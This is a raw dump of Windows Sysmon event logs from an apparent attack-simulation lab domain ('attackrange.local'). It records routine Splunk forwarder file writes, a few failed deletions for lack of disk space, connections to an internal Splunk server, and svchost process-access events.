12:17:27.067{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB3C6C1468A346315595A7346A0FA044,SHA256=FF3AAA113C6A07197F2792E43CACBE1D689AFE53306A1054BCEB3B5A5DD994B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:28.401{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:28.400{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D619563736803F0A322E2D5400BBFF,SHA256=E0D212D3E488FC0CBF065A9B918A99F473E557C76607D6DE48E24069A5DF24C7falsetrue 354300x800000000000000021219671Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:14.472{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64326-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219670Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:28.012{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE263CB676B5DCE316D96D0FFB6F03D1,SHA256=5C023B28B43F4B752B98F1854C95A71953019D9105FE862E7D0C6A3C76D74651,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:28.166{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:28.166{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12018286C22E0B9CF8433712AC632159,SHA256=2261C9D59912E6243DE772FDA536A4B829C59ED538C29780D3D911538855CCEEfalsetrue 11241100x800000000000000057345762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:29.419{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:29.419{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A4A319549039432FBC46FC409E2A40C,SHA256=EBEFE63EF95439051FA7C664C1520AF7969A1322D695015BAA17B2B3CA2E0A7Afalsetrue 23542300x800000000000000021219672Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:29.044{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83546365727AD8D1685B836BA130462A,SHA256=47C97290425CFBA52EBE11E7FE62A8E16622BA4C67E565A110290033395862FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:59.488{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54547-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x800000000000000057345766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.999{8B6011A9-886D-6164-0C00-00000000F101}8481664C:\Windows\system32\svchost.exe{8B6011A9-886E-6164-1500-00000000F101}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.999{8B6011A9-886D-6164-0C00-00000000F101}8481664C:\Windows\system32\svchost.exe{8B6011A9-886E-6164-1500-00000000F101}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.450{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.450{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF307642E847F20FB4BEF1257D1E2C6,SHA256=68A42BC99FE74A1A49A18167BEAAB05888AD1D98847C5439C47B14332BB788E7falsetrue 23542300x800000000000000021219673Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:30.044{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6750092258B09F24254DA2F226064684,SHA256=90452F2EAEBB43F1AF13F75E7A03823028C9F7922C85B1C04E3AF7718348EC21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:31.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:31.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A3F41AC0871D21E15847903F1D82846,SHA256=5D942F731706B2E13E6C571872F40C720D01757269D3ECAFCF57240C372AE393falsetrue 23542300x800000000000000021219674Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:31.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DBC1234288071315D9D29664885648B,SHA256=3AD2852C5D0E94D11FB4B1AC2A33D9AC02C494092DBE20EA1D25D8B07726AD4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000057345767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.999{8B6011A9-886D-6164-0C00-00000000F101}8481664C:\Windows\system32\svchost.exe{8B6011A9-886E-6164-1500-00000000F101}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:32.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:32.466{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E7D5C2D6DD055E1875AD9C4A7BC975,SHA256=EFD64345558F51F60785EA599CC33FFCB0B821F67D55ADAD1C32BED70CC20025falsetrue 23542300x800000000000000021219675Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:32.075{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C4D042D99370570E0D7833EEDAF638,SHA256=5B234EACEF01769AEAB46D73C8078E4461982DE40CDD7F11EDB3119A0233D03A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:04.587{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54548-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.503{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.503{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D77D9D59C9606E4C9C128A3B53F811,SHA256=2DB9D83ACF5D3F14F1C73A6161DC4BF42EE6A9B9BCE09E1C2FE068C16D209A6Efalsetrue 23542300x800000000000000021219678Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:33.106{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26D80B46A78493054F065C94A5908095,SHA256=0B087C509396D3D9A340DD61FF534724D671A5BEB309EAEDC25B98E14F17AEEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16538A5875FB6E95564ABFE169A3FA4A,SHA256=F5943FEB6537D54712D5BF4F199DBD1BFBA9B1AA4A91544CBC77E355B08E2323falsetrue 11241100x800000000000000057345773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:33.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5DE25D62DD7104B562BA46F66BDA161,SHA256=723B234408D5088CE7E9A13FBD5362638D906E41A9B5EDB01992DAAB6E5D167Bfalsetrue 23542300x800000000000000021219677Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:33.059{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AA01E449291AACCC47A407168247E00,SHA256=D415BCF7B54937F10BB58D59F1E13D259DB95DE6C1E4A84D3BC911AD84405187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219676Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:33.059{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCC66E5EA592939C5F379276FBA6A607,SHA256=9ACD7FFB785EC18386225DE6D1047B04755AE5B0562156AC3BA0F265371E08CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:34.517{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:34.517{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0D65BBBA0A259340CB941B2ECFB6A7E,SHA256=4CBB0D2C4BEBCB44E4651559B716B86E688EA2C4E0E23994178B2D45782A2CD3falsetrue 354300x800000000000000021219680Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:20.465{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64327-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219679Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:34.153{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=341A7B99A2299A91F4DBEC68FCB49D36,SHA256=66834291EFA516BF2AF0380637211D15445332F54F5E535EF063E359D81ED02A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:35.532{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:35.532{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653E2CF1A1B81DFBED46E8D926CABBAF,SHA256=11F356517FA8E2AAFC06755619212BCA3804DD120866860BE72C7592EDD151E9falsetrue 23542300x800000000000000021219681Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:35.169{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725A22F43A04C6AB5AE2CBCE21D48BE0,SHA256=FB315F275ADA6F655A19E52757F7EDE149333EEEE80471A7AE2EA864BA61A91C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219682Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:36.169{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E02976F8AE4540A3D24096C37DCBA6,SHA256=619D236CB87C2ADC771772AEC7D57BB4EC200FF7A741283E013287E738238EDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:36.568{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:36.568{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66972EF9B5689F9E19BB811C746F12CA,SHA256=FC89AB1E29EF96DC80522BAE4FBB0EACC0BB339F38EF115967CDE2AC55037E7Afalsetrue 11241100x800000000000000057345784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:36.405{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-09-16 14:17:08.076 23542300x800000000000000057345783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:36.405{8B6011A9-BB8A-618B-4CA0-04000000F101}7452NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98Dfalsetrue 354300x800000000000000057345791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.737{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54549-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x800000000000000057345790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:37.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:37.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7609F908C5F8A4C9D6A2998CE0DFDD5,SHA256=3E08DE352D86E06031C7CBFA9896C2D01D7BF14D8D58147B1C9E15F5866B82CBfalsetrue 23542300x800000000000000021219683Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:37.184{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD56CBF221EBF76468385A693835ED3D,SHA256=E8168C2410C8DC867DE5194526E48EEC76E73198388B6FF23A084D3923650E6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:37.421{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:37.421{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16538A5875FB6E95564ABFE169A3FA4A,SHA256=F5943FEB6537D54712D5BF4F199DBD1BFBA9B1AA4A91544CBC77E355B08E2323falsetrue 11241100x800000000000000057345793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:38.620{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:38.620{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E54AD55A4AA8BB3A3EE380B157F06A6,SHA256=52FB37FB888830C3E772235A727F9F5C54A6790F42CC120FFBDB08DA9E7E8D43falsetrue 23542300x800000000000000021219686Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:38.247{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6803F073B108C45232FD5830FC3F400,SHA256=4B36EA9EAA53E81DF519E5F027A767FEBFE92091057B8E8E499B291A99FCF856,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219685Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:38.247{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AA01E449291AACCC47A407168247E00,SHA256=D415BCF7B54937F10BB58D59F1E13D259DB95DE6C1E4A84D3BC911AD84405187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219684Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 